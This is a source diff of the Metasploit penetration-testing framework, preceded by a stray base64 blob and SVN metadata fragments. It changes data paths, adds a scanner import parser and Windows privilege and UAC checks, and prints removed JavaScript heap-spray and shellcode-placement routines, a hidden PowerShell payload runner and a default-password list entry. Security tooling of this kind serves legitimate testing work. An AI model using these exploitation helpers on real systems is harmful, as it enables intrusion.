gATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
-K 8
-failures
-V 1
-8
-K 15
-svn:realmstring
-V 30
-https://www.metasploit.com:443
-END
@@ -1,3 +1,4 @@
+/AdapterFramework/version/version.jsp
 /AdobeDocumentServices/Config
 /AdobeDocumentServices/Config?wsdl
 /AE/index.jsp
@@ -319,6 +320,7 @@
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
 /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
+/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
 /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
@@ -92,6 +92,7 @@ root
 router
 rw
 rwa
+s!a@m#n$p%c
 san-fran
 sanfran
 scotty
@@ -32,7 +32,7 @@ module Auxiliary::JohnTheRipper
    )

    @run_path  = nil
-    @john_path = ::File.join(Msf::Config.install_root, "data", "john")
+    @john_path = ::File.join(Msf::Config.data_directory, "john")

    autodetect_platform
  end
@@ -23,7 +23,7 @@ module Auxiliary::MimeTypes
  end

  def mime_load_extension_map
-    path = File.join( Msf::Config.install_root, "data", "mime.yml")
+    path = File.join( Msf::Config.data_directory, "mime.yml")
    @extension_map = YAML.load_file(path)
  end

@@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri'
 require 'rex/parser/nmap_nokogiri'
 require 'rex/parser/openvas_nokogiri'
 require 'rex/parser/wapiti_nokogiri'
+require 'rex/parser/outpost24_nokogiri'

 # Legacy XML parsers -- these will be converted some day
 require 'rex/parser/ip360_aspl_xml'
@@ -2926,7 +2927,7 @@ class DBManager
  # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
  # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
  # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
-  # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml
+  # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
  # If there is no match, an error is raised instead.
  def import_filetype_detect(data)

@@ -3059,6 +3060,9 @@ class DBManager
            @import_filedata[:type] = "CI"
            return :ci_xml
          end
+        when "main"
+          @import_filedata[:type] = "Outpost24 XML"
+          return :outpost24_xml
        else
          # Give up if we haven't hit the root tag in the first few lines
          break if line_count > 10
@@ -3649,7 +3653,7 @@ class DBManager
    data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)}
    wspace = args[:wspace] || args['wspace'] || workspace
    bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
-    basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf")
+    basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf")

    allow_yaml = false
    btag = nil
@@ -5923,6 +5927,36 @@ class DBManager
    parser.parse(args[:data])
  end

+  def import_outpost24_xml(args={}, &block)
+    bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
+    wspace = args[:wspace] || workspace
+    if Rex::Parser.nokogiri_loaded
+      parser = "Nokogiri v#{::Nokogiri::VERSION}"
+      noko_args = args.dup
+      noko_args[:blacklist] = bl
+      noko_args[:wspace] = wspace
+      if block
+        yield(:parser, parser)
+        import_outpost24_noko_stream(noko_args) {|type, data| yield type,data}
+      else
+        import_outpost24_noko_stream(noko_args)
+      end
+      return true
+    else # Sorry
+      raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.")
+    end
+  end
+
+  def import_outpost24_noko_stream(args={},&block)
+    if block
+      doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data }
+    else
+      doc = Rex::Parser::Outpost24Document.new(args,self)
+    end
+    parser = ::Nokogiri::XML::SAX::Parser.new(doc)
+    parser.parse(args[:data])
+  end
+

  def unserialize_object(xml_elem, allow_yaml = false)
    return nil unless xml_elem
@@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm
    register_advanced_options(
      [
        OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe assembly listing decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
      ], self.class)
  end

@@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite
    register_advanced_options(
      [
        OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe file-writing decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
      ], self.class)
  end

@@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS
    register_advanced_options(
      [
        OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
      ], self.class)
  end

@@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB
    register_advanced_options(
      [
        OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
      ], self.class)
  end

@@ -47,19 +47,18 @@ module Exploit::FileDropper
          false
        end
      else
-        cmds = [
+        win_cmds = [
            %Q|attrib.exe -r "#{win_file}"|,
-            %Q|del.exe /f /q "#{win_file}"|,
-            %Q|rm -f "#{file}" >/dev/null|,
-          ]
-
+            %Q|del.exe /f /q "#{win_file}"|
+        ]
        # We need to be platform-independent here. Since we can't be
        # certain that {#target} is accurate because exploits with
        # automatic targets frequently change it, we just go ahead and
        # run both a windows and a unixy command in the same line. One
        # of them will definitely fail and the other will probably
        # succeed. Doing it this way saves us an extra round-trip.
-        session.shell_command_token(cmds.join(" ; "))
+        # Trick shared by @mihi42
+        session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
        print_good("Deleted #{file}")
        true
      end
@@ -3,7 +3,7 @@ require 'rex/service_manager'
 require 'rex/exploitation/obfuscatejs'
 require 'rex/exploitation/encryptjs'
 require 'rex/exploitation/heaplib'
-require 'rex/exploitation/javascriptosdetect'
+require 'rex/exploitation/js'

 module Msf

@@ -678,6 +678,14 @@ protected
        OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
        OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)',  0]),
      ], Exploit::Remote::HttpServer::HTML)
+
+    # Cache Javascript
+    @cache_base64         = nil
+    @cache_ajax_download  = nil
+    @cache_mstime_malloc  = nil
+    @cache_property_spray = nil
+    @cache_heap_spray     = nil
+    @cache_os_detect      = nil
  end

  #
@@ -709,146 +717,7 @@ protected
  end

  def js_base64
-    js = <<-ENDJS
-      // Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
-      // variable names changed to make obfuscation easier
-      var Base64 = {
-        // private property
-        _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
-
-        // private method
-        _utf8_encode : function ( input ){
-          input = input.replace(/\\r\\n/g,"\\n");
-          var utftext = "";
-          var input_idx;
-
-          for (input_idx = 0; input_idx < input.length; input_idx++) {
-            var chr = input.charCodeAt(input_idx);
-            if (chr < 128) {
-              utftext += String.fromCharCode(chr);
-            }
-            else if((chr > 127) && (chr < 2048)) {
-              utftext += String.fromCharCode((chr >> 6) | 192);
-              utftext += String.fromCharCode((chr & 63) | 128);
-            } else {
-              utftext += String.fromCharCode((chr >> 12) | 224);
-              utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
-              utftext += String.fromCharCode((chr & 63) | 128);
-            }
-          }
-
-          return utftext;
-        },
-
-        // public method for encoding
-        encode : function( input ) {
-          var output = "";
-          var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
-          var input_idx = 0;
-
-          input = Base64._utf8_encode(input);
-
-          while (input_idx < input.length) {
-            chr1 = input.charCodeAt( input_idx++ );
-            chr2 = input.charCodeAt( input_idx++ );
-            chr3 = input.charCodeAt( input_idx++ );
-
-            enc1 = chr1 >> 2;
-            enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
-            enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
-            enc4 = chr3 & 63;
-
-            if (isNaN(chr2)) {
-              enc3 = enc4 = 64;
-            } else if (isNaN(chr3)) {
-              enc4 = 64;
-            }
-            output = output +
-            this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
-            this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
-          }
-          return output;
-        },
-        // public method for decoding
-        decode : function (input) {
-          var output = "";
-          var chr1, chr2, chr3;
-          var enc1, enc2, enc3, enc4;
-          var i = 0;
-
-          input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
-
-          while (i < input.length) {
-
-            enc1 = this._keyStr.indexOf(input.charAt(i++));
-            enc2 = this._keyStr.indexOf(input.charAt(i++));
-            enc3 = this._keyStr.indexOf(input.charAt(i++));
-            enc4 = this._keyStr.indexOf(input.charAt(i++));
-
-            chr1 = (enc1 << 2) | (enc2 >> 4);
-            chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
-            chr3 = ((enc3 & 3) << 6) | enc4;
-
-            output = output + String.fromCharCode(chr1);
-
-            if (enc3 != 64) {
-              output = output + String.fromCharCode(chr2);
-            }
-            if (enc4 != 64) {
-              output = output + String.fromCharCode(chr3);
-            }
-
-          }
-
-          output = Base64._utf8_decode(output);
-
-          return output;
-
-        },
-        _utf8_decode : function (utftext) {
-          var string = "";
-          var input_idx = 0;
-          var chr1 = 0;
-          var chr2 = 0;
-          var chr3 = 0;
-
-          while ( input_idx < utftext.length ) {
-
-            chr1 = utftext.charCodeAt(input_idx);
-
-            if (chr1 < 128) {
-              string += String.fromCharCode(chr1);
-              input_idx++;
-            }
-            else if((chr1 > 191) && (chr1 < 224)) {
-              chr2 = utftext.charCodeAt(input_idx+1);
-              string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
-              input_idx += 2;
-            } else {
-              chr2 = utftext.charCodeAt(input_idx+1);
-              chr3 = utftext.charCodeAt(input_idx+2);
-              string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
-              input_idx += 3;
-            }
-          }
-
-          return string;
-        }
-
-
-      };
-
-    ENDJS
-    opts = {
-      'Symbols' => {
-        'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
-          input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
-        'Methods'   => %w{ _utf8_encode _utf8_decode encode decode }
-      }
-    }
-    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-
-    return js
+    @cache_base64 ||= Rex::Exploitation::Js::Utils.base64
  end


@@ -871,34 +740,7 @@ protected
  #    </script>
  #
  def js_ajax_download
-    %Q|function ajax_download(oArg) {
-      method = oArg.method;
-      path   = oArg.path;
-      data   = oArg.data;
-
-      if (method == undefined) { method = "GET"; }
-      if (method == path)      { throw "Missing parameter 'path'"; }
-      if (data   == undefined) { data = null; }
-
-      if (window.XMLHttpRequest) {
-        xmlHttp = new XMLHttpRequest();
-      }
-      else {
-        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
-      }
-
-      if (xmlHttp.overrideMimeType) {
-        xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
-      }
-
-      xmlHttp.open(method, path, false);
-      xmlHttp.send(data);
-      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
-        return xmlHttp.responseText;
-      }
-      return null;
-    }
-    |
+    @cache_ajax_download ||= Rex::Exploitation::Js::Network.ajax_download
  end


@@ -934,39 +776,7 @@ protected
  #     </script>
  #
  def js_mstime_malloc
-    %Q|
-    function mstime_malloc(oArg) {
-      shellcode     = oArg.shellcode;
-      offset        = oArg.offset;
-      heapBlockSize = oArg.heapBlockSize;
-      objId         = oArg.objId;
-
-      if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
-      if (offset        == undefined) { offset = 0; }
-      if (heapBlockSize == undefined) { throw "Size must be defined"; }
-
-      buf = "";
-      for (i=0; i < heapBlockSize/4; i++) {
-        if (i == offset) {
-          if (i == 0) { buf += shellcode;       }
-          else        { buf += ";" + shellcode; }
-        }
-        else {
-          buf += ";##{Rex::Text.rand_text_hex(6)}";
-        }
-      }
-
-      e = document.getElementById(objId);
-      if (e == null) {
-        eleId = "#{Rex::Text.rand_text_alpha(5)}"
-        acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
-        document.body.innerHTML = document.body.innerHTML + acTag;
-        e = document.getElementById(eleId);
-      }
-      try { e.values = buf; }
-      catch (e) {}
-    }
-    |
+    @cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc
  end

  #
@@ -985,90 +795,22 @@ protected
  #
  # Example of using the 'sprayHeap' function:
  #   <script>
-  #   #{spray}
+  #   #{js_property_spray}
  #
  #   var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444");
  #   sprayHeap({shellcode:s, heapBlockSize:0x80000});
  #   </script>
  #
  def js_property_spray
-    sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
-    js = %Q|
-    var #{sym_div_container};
-    function sprayHeap( oArg ) {
-
-      shellcode     = oArg.shellcode;
-      offset        = oArg.offset;
-      heapBlockSize = oArg.heapBlockSize;
-      maxAllocs     = oArg.maxAllocs;
-      objId         = oArg.objId;
-
-      if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
-      if (offset        == undefined)  { offset        = 0x00; }
-      if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
-      if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
-
-      if (offset > 0x800) { throw "Bad alignment"; }
-
-      #{sym_div_container} = document.getElementById(objId);
-
-      if (#{sym_div_container} == null) {
-        #{sym_div_container} = document.createElement("div");
-      }
-
-      #{sym_div_container}.style.cssText = "display:none";
-      var data;
-      junk = unescape("%u2020%u2020");
-      while (junk.length < offset+0x1000) junk += junk;
-
-      data = junk.substring(0,offset) + shellcode;
-      data += junk.substring(0,0x800-offset-shellcode.length);
-
-      while (data.length < heapBlockSize) data += data;
-
-      for (var i = 0; i < maxAllocs; i++)
-      {
-        var obj = document.createElement("button");
-        obj.title = data.substring(0, (heapBlockSize-2)/2);
-        #{sym_div_container}.appendChild(obj);
-      }
-    }
-    |
+    @cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray
  end

  def js_heap_spray
-    js = %Q|var memory = new Array();
-function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
-  var index;
-  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
-  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
-  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
-  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
-
-  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
-  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
-  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
-
-  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
-  for (index = 0; index < heapBlockCnt; index++) {
-    memory[index] = retSlide + shellcode;
-  }
-}
-|
-    opts = {
-      'Symbols' => {
-        'Variables' => %w{ shellcode retSlide payLoadSize memory index
-          heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize
-          heapBlockCnt },
-        'Methods'   => %w{ sprayHeap }
-      }
-    }
-    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    return js
+    @cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray
  end

  def js_os_detect
-    return ::Rex::Exploitation::JavascriptOSDetect.new
+    @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
  end

  # Transmits a html response to the supplied client
@@ -51,7 +51,7 @@ module Exploit::Java

    # Instantiate the JVM with a classpath pointing to the JDK tools.jar
    # and our javatoolkit jar.
-    classpath  = File.join(Msf::Config.install_root, "data", "exploits", "msfJavaToolkit.jar")
+    classpath  = File.join(Msf::Config.data_directory, "exploits", "msfJavaToolkit.jar")
    classpath += ":" + toolsjar
    classpath += ":" + datastore['ADDCLASSPATH'] if datastore['ADDCLASSPATH']

@@ -1,19 +0,0 @@
-
-module Msf
-module Exploit::Local::Unix
-
-  include Exploit::Local::CompileC
-
-  def unix_socket_h(metasm_exe)
-    [
-      "external/source/meterpreter/source/bionic/libc/include/sys/socket.h",
-    ].each do |fname|
-      cparser.parse(File.read(fname), fname)
-    end
-
-  end
-
-
-end
-end
-
@@ -75,7 +75,7 @@ module Exploit::Remote::MSSQL
    register_advanced_options(
      [
        OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk",
-          File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+          File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
        ]),
        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
      ], Msf::Exploit::Remote::MSSQL)
@@ -34,7 +34,7 @@ module Exploit::Remote::MSSQL_SQLI
    register_advanced_options(
      [
        OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk",
-          File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+          File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
        ])
      ], Msf::Exploit::Remote::MSSQL_SQLI)

@@ -150,7 +150,7 @@ module Exploit::Remote::MYSQL

  def mysql_upload_sys_udf(arch=:win32,target_path=nil)
    fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll")
-    sys_dll = File.join( Msf::Config.install_root, "data", "exploits", "mysql", fname )
+    sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
    data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
    blob = "0x"
    blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
@@ -116,7 +116,7 @@ module Exploit::Powershell

    ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = "#{ps_bin}"
+$si.FileName = #{ps_bin}
 $si.Arguments = '#{ps_args}'
 $si.UseShellExecute = $false
 $si.RedirectStandardOutput = $true
@@ -146,11 +146,11 @@ EOS
      psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
    end
    # Determine appropriate architecture
-    ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
    # Wrap in hidden runtime
    psh_payload = run_hidden_psh(psh_payload,ps_bin)
    # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
+    command = "%COMSPEC% /B /C start powershell.exe -Command #{psh_payload.gsub("\n",';').gsub('"','\"')}\r\n"
  end

  #
@@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC
  end

  def progresolv(number)
-    names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt")
+    names = File.join(Msf::Config.data_directory, "wordlists", "rpc_names.txt")
    File.open(names, "rb").each_line do |line|
      next if line.empty? || line =~ /^\s*#/

@@ -112,6 +112,8 @@ class Msf::Module::SiteReference < Msf::Module::Reference
      self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s
    elsif (in_ctx_id == 'BPS')
      self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s
+    elsif (in_ctx_id == 'ZDI')
+      self.site = 'http://www.zerodayinitiative.com/advisories/ZDI-' + in_ctx_val.to_s
    elsif (in_ctx_id == 'URL')
      self.site = in_ctx_val.to_s
    else
@@ -1,9 +1,30 @@
 # -*- coding: binary -*-

 require 'msf/core/post/windows/accounts'
+require 'msf/core/post/windows/registry'

 module Msf::Post::Windows::Priv
  include ::Msf::Post::Windows::Accounts
+  include Msf::Post::Windows::Registry
+
+  INTEGRITY_LEVEL_SID = {
+      :low => 'S-1-16-4096',
+      :medium => 'S-1-16-8192',
+      :high => 'S-1-16-12288',
+      :system => 'S-1-16-16384'
+  }
+
+  SYSTEM_SID = 'S-1-5-18'
+  ADMINISTRATORS_SID = 'S-1-5-32-544'
+
+  # http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
+  # ConsentPromptBehaviorAdmin
+  UAC_NO_PROMPT = 0
+  UAC_PROMPT_CREDS_IF_SECURE_DESKTOP = 1
+  UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP = 2
+  UAC_PROMPT_CREDS = 3
+  UAC_PROMPT_CONSENT = 4
+  UAC_DEFAULT = 5

  #
  # Returns true if user is admin and false if not.
@@ -13,34 +34,48 @@ module Msf::Post::Windows::Priv
      # Assume true if the OS doesn't expose this (Windows 2000)
      session.railgun.shell32.IsUserAnAdmin()["return"] rescue true
    else
-      cmd = "cmd.exe /c reg query HKU\\S-1-5-19"
-      results = session.shell_command_token_win32(cmd)
-      if results =~ /Error/
-        return false
-      else
+      local_service_key = registry_enumkeys('HKU\S-1-5-19')
+      if local_service_key
        return true
+      else
+        return false
      end
    end
  end

+  #
+  # Returns true if in the administrator group
+  #
+  def is_in_admin_group?
+    whoami = get_whoami
+
+    if whoami.nil?
+      print_error("Unable to identify admin group membership")
+      return nil
+    elsif whoami.include? ADMINISTRATORS_SID
+      return true
+    else
+      return false
+    end
+  end
+
  #
  # Returns true if running as Local System
  #
  def is_system?
    if session_has_ext
-      local_sys = resolve_sid("S-1-5-18")
+      local_sys = resolve_sid(SYSTEM_SID)
      if session.sys.config.getuid == "#{local_sys[:domain]}\\#{local_sys[:name]}"
        return true
      else
        return false
      end
    else
-      cmd = "cmd.exe /c reg query HKLM\\SAM\\SAM"
-      results = session.shell_command_token_win32(cmd)
-      if results =~ /Error/
-        return false
-      else
+      results = registry_enumkeys('HKLM\SAM\SAM')
+      if results
        return true
+      else
+        return false
      end
    end
  end
@@ -55,24 +90,80 @@ module Msf::Post::Windows::Priv
    uac = false
    winversion = session.sys.config.sysinfo['OS']

-    if winversion =~ /Windows (Vista|7|2008)/
-      if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
+    if winversion =~ /Windows (Vista|7|8|2008)/
+      unless is_system?
        begin
-          key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',KEY_READ)
-
-          if key.query_value('EnableLUA').data == 1
-            uac = true
-          end
-
-          key.close
-        rescue::Exception => e
-          print_error("Error Checking UAC: #{e.class} #{e}")
+          enable_lua = registry_getvaldata(
+              'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
+              'EnableLUA'
+          )
+          uac = (enable_lua == 1)
+        rescue Rex::Post::Meterpreter::RequestError => e
+          print_error("Error Checking if UAC is Enabled: #{e.class} #{e}")
        end
      end
    end
    return uac
  end

+  #
+  # Returns the UAC Level
+  #
+  # @see http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
+  # 2 - Always Notify, 5 - Default, 0 - Disabled
+  #
+  def get_uac_level
+    begin
+      uac_level = registry_getvaldata(
+          'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
+          'ConsentPromptBehaviorAdmin'
+      )
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("Error Checking UAC Level: #{e.class} #{e}")
+    end
+
+    if uac_level
+      return uac_level
+    else
+      return nil
+    end
+  end
+
+  #
+  # Returns the Integrity Level
+  #
+  def get_integrity_level
+    whoami = get_whoami
+
+    if whoami.nil?
+      print_error("Unable to identify integrity level")
+      return nil
+    else
+      INTEGRITY_LEVEL_SID.each_pair do |k,sid|
+        if whoami.include? sid
+          return sid
+        end
+      end
+    end
+  end
+
+  #
+  # Returns the output of whoami /groups
+  #
+  # Returns nil if Windows whoami is not available
+  #
+  def get_whoami
+    whoami = cmd_exec('cmd.exe /c whoami /groups')
+
+    if whoami.nil? or whoami.empty?
+      return nil
+    elsif whoami =~ /is not recognized/ or whoami =~ /extra operand/ or whoami =~ /Access is denied/
+      return nil
+    else
+      return whoami
+    end
+  end
+
  #
  # Return true if the session has extended capabilities (ie meterpreter)
  #
@@ -107,6 +107,7 @@ class Core
      "connect"  => "Communicate with a host",
      "color"    => "Toggle color",
      "exit"     => "Exit the console",
+      "edit"     => "Edit the current module with $VISUAL or $EDITOR",
      "go_pro"   => "Launch Metasploit web GUI",
      "grep"     => "Grep the output of another command",
      "help"     => "Help menu",
@@ -627,6 +628,37 @@ class Core
    true
  end

+  def local_editor
+    Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') || '/usr/bin/vim'
+  end
+
+  def cmd_edit_help
+    msg = "Edit the currently active module"
+    msg = "#{msg} #{local_editor ? "with #{local_editor}" : "($VISUAL or $EDITOR must be set first)"}."
+    print_line "Usage: edit"
+    print_line
+    print_line msg
+    print_line "When done editing, you must reload the module with 'reload' or 'rexploit'."
+    print_line
+  end
+
+  #
+  # Edit the currently active module
+  #
+  def cmd_edit
+    unless local_editor
+      print_error "$VISUAL or $EDITOR must be set first. Try 'export EDITOR=/usr/bin/vim'"
+      return
+    end
+    if active_module
+      path = active_module.file_path
+      print_status "Launching #{local_editor} #{path}"
+      system(local_editor,path)
+    else
+      print_error "Nothing to edit -- try using a module first."
+    end
+  end
+
  #
  # Instructs the driver to stop executing.
  #
@@ -989,7 +1021,7 @@ class Core
  def cmd_load_help
    print_line "Usage: load <path> [var=val var=val ...]"
    print_line
-    print_line "Loads a plugin from the supplied path.  If path is not absolute, fist looks"
+    print_line "Loads a plugin from the supplied path.  If path is not absolute, first looks"
    print_line "in the user's plugin directory (#{Msf::Config.user_plugin_directory}) then"
    print_line "in the framework root plugin directory (#{Msf::Config.plugin_directory})."
    print_line "The optional var=val options are custom parameters that can be passed to plugins."
@@ -3081,14 +3113,14 @@ class Core
      'Columns' => columns
      )
    [
-      [ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || '', 'Log all console input and output' ],
-      [ 'LogLevel', framework.datastore['LogLevel'] || '', 'Verbosity of logs (default 0, max 5)' ],
-      [ 'MinimumRank', framework.datastore['MinimumRank'] || '', 'The minimum rank of exploits that will run without explicit confirmation' ],
-      [ 'SessionLogging', framework.datastore['SessionLogging'] || '', 'Log all input and output for sessions' ],
-      [ 'TimestampOutput', framework.datastore['TimestampOutput'] || '', 'Prefix all console output with a timestamp' ],
-      [ 'Prompt', framework.datastore['Prompt'] || '', "The prompt string, defaults to \"#{Msf::Ui::Console::Driver::DefaultPrompt}\"" ],
-      [ 'PromptChar', framework.datastore['PromptChar'] || '', "The prompt character, defaults to \"#{Msf::Ui::Console::Driver::DefaultPromptChar}\"" ],
-      [ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || '', 'A format for timestamp escapes in the prompt, see ruby\'s strftime docs' ],
+      [ 'ConsoleLogging', framework.datastore['ConsoleLogging'] || "false", 'Log all console input and output' ],
+      [ 'LogLevel', framework.datastore['LogLevel'] || "0", 'Verbosity of logs (default 0, max 5)' ],
+      [ 'MinimumRank', framework.datastore['MinimumRank'] || "0", 'The minimum rank of exploits that will run without explicit confirmation' ],
+      [ 'SessionLogging', framework.datastore['SessionLogging'] || "false", 'Log all input and output for sessions' ],
+      [ 'TimestampOutput', framework.datastore['TimestampOutput'] || "false", 'Prefix all console output with a timestamp' ],
+      [ 'Prompt', framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt.to_s.gsub(/%.../,"") , "The prompt string" ],
+      [ 'PromptChar', framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar.to_s.gsub(/%.../,""), "The prompt character" ],
+      [ 'PromptTimeFormat', framework.datastore['PromptTimeFormat'] || Time::DATE_FORMATS[:db].to_s, 'Format for timestamp escapes in prompts' ],
    ].each { |r| tbl << r }

    print(tbl.to_s)
@@ -1,43 +0,0 @@
-# -*- coding: binary -*-
-
-require 'msf/core'
-require 'rex/text'
-require 'rex/exploitation/jsobfu'
-
-module Rex
-module Exploitation
-
-#
